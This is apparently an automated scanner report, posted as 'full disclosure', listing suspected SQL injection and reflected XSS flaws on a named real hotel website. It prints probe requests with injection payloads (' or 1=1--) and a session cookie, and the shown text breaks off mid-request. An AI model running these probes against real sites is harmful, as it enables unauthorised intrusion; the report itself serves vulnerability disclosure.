Current Research | Full Disclosure | As of March 14, 2011

Plesk SMB 10.2.0 Windows - Site Editor | Full Disclosure
Plesk Small Business Manager 10.2.0 for Windows | Full Disclosure
Hoyt LLC Research | Full Disclosure Report on Stored XSS in SmarterMail 8.0
Hoyt LLC Research - Full Disclosure | Blog Article | SmarterStats 6.0
Hoyt LLC Research - Full Disclosure | Blog Article | SmarterMail 7.x Series
Report generated by Hoyt LLC Research at Thu Oct 21 16:54:32 CDT 2010.


Cross Site Scripting Reports | Hoyt LLC Research

1. SQL injection

1.1. http://www.historichotels.org/SpecialsPackages [REST URL parameter 1]

1.2. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif [REST URL parameter 1]

1.3. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif [REST URL parameter 2]

1.4. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif [REST URL parameter 3]

1.5. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif [REST URL parameter 4]

1.6. http://www.historichotels.org/hotel_image.php [REST URL parameter 1]

1.7. http://www.historichotels.org/inc_hotel_list.php [REST URL parameter 1]

1.8. http://www.historichotels.org/inc_hotel_list.php [hotel_state_code parameter]

1.9. http://www.historichotels.org/index.php [REST URL parameter 1]

1.10. http://www.historichotels.org/shop [REST URL parameter 1]

1.11. http://www.historichotels.org/spas_retreats [REST URL parameter 1]

1.12. http://www.historichotels.org/step_back_in_time [REST URL parameter 1]

1.13. http://www.historichotels.org/taste_of_napa [REST URL parameter 1]

1.14. http://www.historichotels.org/the_heathman_hotel_offer [REST URL parameter 1]

1.15. http://www.historichotels.org/the_lenox_special_offer [REST URL parameter 1]

1.16. http://www.historichotels.org/vacations_leisure [REST URL parameter 1]

1.17. http://www.historichotels.org/woodlands_inn_1906 [REST URL parameter 1]

1.18. http://www.historichotels.org/wort_hospitality [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://www.historichotels.org/ [name of an arbitrarily supplied request parameter]

2.2. http://www.historichotels.org/SpecialsPackages [7f98a">4d036e11c5f parameter]

2.3. http://www.historichotels.org/SpecialsPackages [name of an arbitrarily supplied request parameter]

2.4. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif [name of an arbitrarily supplied request parameter]

2.5. http://www.historichotels.org/index.php [layout parameter]

2.6. http://www.historichotels.org/index.php [name of an arbitrarily supplied request parameter]

2.7. http://www.historichotels.org/shop [name of an arbitrarily supplied request parameter]

2.8. http://www.historichotels.org/spas_retreats [name of an arbitrarily supplied request parameter]

2.9. http://www.historichotels.org/step_back_in_time [name of an arbitrarily supplied request parameter]

2.10. http://www.historichotels.org/taste_of_napa [name of an arbitrarily supplied request parameter]

2.11. http://www.historichotels.org/the_heathman_hotel_offer [name of an arbitrarily supplied request parameter]

2.12. http://www.historichotels.org/the_lenox_special_offer [name of an arbitrarily supplied request parameter]

2.13. http://www.historichotels.org/vacations_leisure [name of an arbitrarily supplied request parameter]

2.14. http://www.historichotels.org/woodlands_inn_1906 [name of an arbitrarily supplied request parameter]

2.15. http://www.historichotels.org/wort_hospitality [name of an arbitrarily supplied request parameter]

3. Cookie without HttpOnly flag set

4. Cross-domain Referer leakage

4.1. http://www.historichotels.org/SpecialsPackages

4.2. http://www.historichotels.org/index.php

5. Cross-domain script include

5.1. http://www.historichotels.org/

5.2. http://www.historichotels.org/SpecialsPackages

5.3. http://www.historichotels.org/favicon.ico

5.4. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif

5.5. http://www.historichotels.org/index.php

5.6. http://www.historichotels.org/shop

5.7. http://www.historichotels.org/spas_retreats

5.8. http://www.historichotels.org/step_back_in_time

5.9. http://www.historichotels.org/taste_of_napa

5.10. http://www.historichotels.org/the_heathman_hotel_offer

5.11. http://www.historichotels.org/the_lenox_special_offer

5.12. http://www.historichotels.org/vacations_leisure

5.13. http://www.historichotels.org/woodlands_inn_1906

5.14. http://www.historichotels.org/wort_hospitality

6. Email addresses disclosed

6.1. http://www.historichotels.org/favicon.ico

6.2. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif

6.3. http://www.historichotels.org/hotel_image.php

6.4. http://www.historichotels.org/shop

7. HTML does not specify charset

7.1. http://www.historichotels.org/hotel_image.php

7.2. http://www.historichotels.org/inc_hotel_list.php



1. SQL injection  next
There are 18 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.historichotels.org/SpecialsPackages [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.historichotels.org
Path:   /SpecialsPackages

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /SpecialsPackages' HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.historichotels.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:52:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html

<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup.com?subject=Historic Hotels of Ameri
...[SNIP]...

Request 2

GET /SpecialsPackages'' HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.historichotels.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 20 Oct 2010 23:52:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:52:16 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...

1.2. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.historichotels.org
Path:   /fckeditor/editor/images2/1x1.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /fckeditor'/editor/images2/1x1.gif HTTP/1.1
Accept: */*
Referer: http://www.historichotels.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Oct 2010 00:06:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html

<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup.com?subject=Historic Hotels of Ameri
...[SNIP]...

Request 2

GET /fckeditor''/editor/images2/1x1.gif HTTP/1.1
Accept: */*
Referer: http://www.historichotels.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 21 Oct 2010 00:06:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 21 Oct 2010 00:06:10 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...

1.3. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.historichotels.org
Path:   /fckeditor/editor/images2/1x1.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /fckeditor/editor'/images2/1x1.gif HTTP/1.1
Accept: */*
Referer: http://www.historichotels.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Oct 2010 00:06:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html

<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup.com?subject=Historic Hotels of Ameri
...[SNIP]...

Request 2

GET /fckeditor/editor''/images2/1x1.gif HTTP/1.1
Accept: */*
Referer: http://www.historichotels.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 21 Oct 2010 00:06:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 21 Oct 2010 00:06:43 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...

1.4. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.historichotels.org
Path:   /fckeditor/editor/images2/1x1.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /fckeditor/editor/images2'/1x1.gif HTTP/1.1
Accept: */*
Referer: http://www.historichotels.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Oct 2010 00:07:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html

<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup.com?subject=Historic Hotels of Ameri
...[SNIP]...

Request 2

GET /fckeditor/editor/images2''/1x1.gif HTTP/1.1
Accept: */*
Referer: http://www.historichotels.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 21 Oct 2010 00:07:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 21 Oct 2010 00:07:17 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...

1.5. http://www.historichotels.org/fckeditor/editor/images2/1x1.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.historichotels.org
Path:   /fckeditor/editor/images2/1x1.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /fckeditor/editor/images2/1x1.gif' HTTP/1.1
Accept: */*
Referer: http://www.historichotels.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Oct 2010 00:07:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html

<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup.com?subject=Historic Hotels of Ameri
...[SNIP]...

Request 2

GET /fckeditor/editor/images2/1x1.gif'' HTTP/1.1
Accept: */*
Referer: http://www.historichotels.org/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 21 Oct 2010 00:07:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 21 Oct 2010 00:07:39 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...

1.6. http://www.historichotels.org/hotel_image.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.historichotels.org
Path:   /hotel_image.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 13560420'%20or%201%3d1--%20 and 13560420'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /hotel_image.php13560420'%20or%201%3d1--%20 HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Oct 2010 20:52:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 21 Oct 2010 20:52:18 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html



<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Home, Historic Hotels of America</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
<META name="description" content="Historic Hotels of America features 213 historic hotels, quality hotels that have maintained their historic architecture and ambience, ideal for leisure vacations, romantic getaways and business travel.">
<META name="keywords" content="historic hotels, historic hotels of america, hha, historic hotel in america, national trust historic hotels">
   <script type="text/javascript" src="/scripts/qadmin.js"></script>
   <script type="text/javascript" src="/scripts/sorttable.js"></script>
   <script type="text/javascript" src="/scripts/calendar.js"></script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
   <script type="text/javascript">
       _uacct = "UA-232386-1";
       urchinTracker();
   </script>
   <style type="text/css">    
   <!--
       A.footerlink:link {
           FONT-WEIGHT: normal; FONT-SIZE: 8pt; COLOR: #76715d; FONT-FAMILY: "Times New Roman", Times, serif; FONT-VARIANT: normal; TEXT-DECORATION: none
       }
       A.footerlink:hover {
           FONT-WEIGHT: normal; FONT-SIZE: 8pt; TEXT-TRANSFORM: none; COLOR: #76715d; FONT-FAMILY: "Times New Roman", Times, serif; FONT-VARIANT: normal; TEXT-DECORATION: underline
       }
       A.footerlink:visited {
           FONT-WEIGHT: normal; FONT-SIZE: 8pt; TEXT-TRANSFORM: none; COLOR: #76715d; FONT-FAMILY: "Times New Roman", Times, serif; FONT-VARIANT: normal; TEXT-DECORATION: none
       }
...[SNIP]...

Request 2

GET /hotel_image.php13560420'%20or%201%3d2--%20 HTTP/1.1
Host: www.historichotels.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmc=15851695; __utmb=15851695;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 21 Oct 2010 20:52:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 21 Oct 2010 20:52:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html



<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
<META name="description" content="">
<META name="keywords" content="">
   <script type="text/javascript" src="/scripts/qadmin.js"></script>
   <script type="text/javascript" src="/scripts/sorttable.js"></script>
   <script type="text/javascript" src="/scripts/calendar.js"></script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
   <script type="text/javascript">
       _uacct = "UA-232386-1";
       urchinTracker();
   </script>
   <style type="text/css">    
   <!--
       A.footerlink:link {
           FONT-WEIGHT: normal; FONT-SIZE: 8pt; COLOR: #76715d; FONT-FAMILY: "Times New Roman", Times, serif; FONT-VARIANT: normal; TEXT-DECORATION: none
       }
       A.footerlink:hover {
           FONT-WEIGHT: normal; FONT-SIZE: 8pt; TEXT-TRANSFORM: none; COLOR: #76715d; FONT-FAMILY: "Times New Roman", Times, serif; FONT-VARIANT: normal; TEXT-DECORATION: underline
       }
       A.footerlink:visited {
           FONT-WEIGHT: normal; FONT-SIZE: 8pt; TEXT-TRANSFORM: none; COLOR: #76715d; FONT-FAMILY: "Times New Roman", Times, serif; FONT-VARIANT: normal; TEXT-DECORATION: none
       }
       A.footerlink:hover {
           FONT-WEIGHT: normal; FONT-SIZE: 8pt; TEXT-TRANSFORM: none; COLOR: #76715d; FONT-FAMILY: "Times New Roman", Times, serif; FONT-VARIANT: normal; TEXT-DECORATION: underline
       }

       A:link {
        COLOR: #1b498c; FONT-STYLE: normal; FONT-FAMILY: "Times New Roman", Times, serif
       }

...[SNIP]...

1.7. http://www.historichotels.org/inc_hotel_list.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.historichotels.org
Path:   /inc_hotel_list.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /inc_hotel_list.php'?hotel_state_code=CA& HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://www.historichotels.org/
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Oct 2010 23:44:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Content-type: text/html

<p style="font-family: Verdana, Geneva, Arial">Sorry, but you have encountered and error. <br /> <br />Please contact <b><i><a href="mailto:hha@preferredhotelgroup.com?subject=Historic Hotels of Ameri
...[SNIP]...

Request 2

GET /inc_hotel_list.php''?hotel_state_code=CA& HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://www.historichotels.org/
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Host: www.historichotels.org
Proxy-Connection: Keep-Alive
Cookie: __utmc=15851695; __utma=15851695.1873633605.1287100145.1287100145.1287617241.2; __utmz=15851695.1287617241.2.2.utmccn=(referral)|utmcsr=summithotels.com|utmcct=/summit/special_offers/index.aspx|utmcmd=referral; __utmb=15851695; PHPSESSID=e9406215f1938f2fbeb75b56ce1db479

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 20 Oct 2010 23:44:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 20 Oct 2010 23:44:38 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title>Historic Hotels of America</title>
<META http-equiv=Content-Type
...[SNIP]...

1.8. http://www.historichotels.org/inc_hotel_list.php [hotel_state_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.historichotels.org
Path:   /inc_hotel_list.php

Issue detail

The hotel_state_code parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the hotel_state_code parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /inc_hotel_list.php?hotel_state_code=CA'& HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://www.historichotels.org/
Accept-Encoding: gzip, deflate
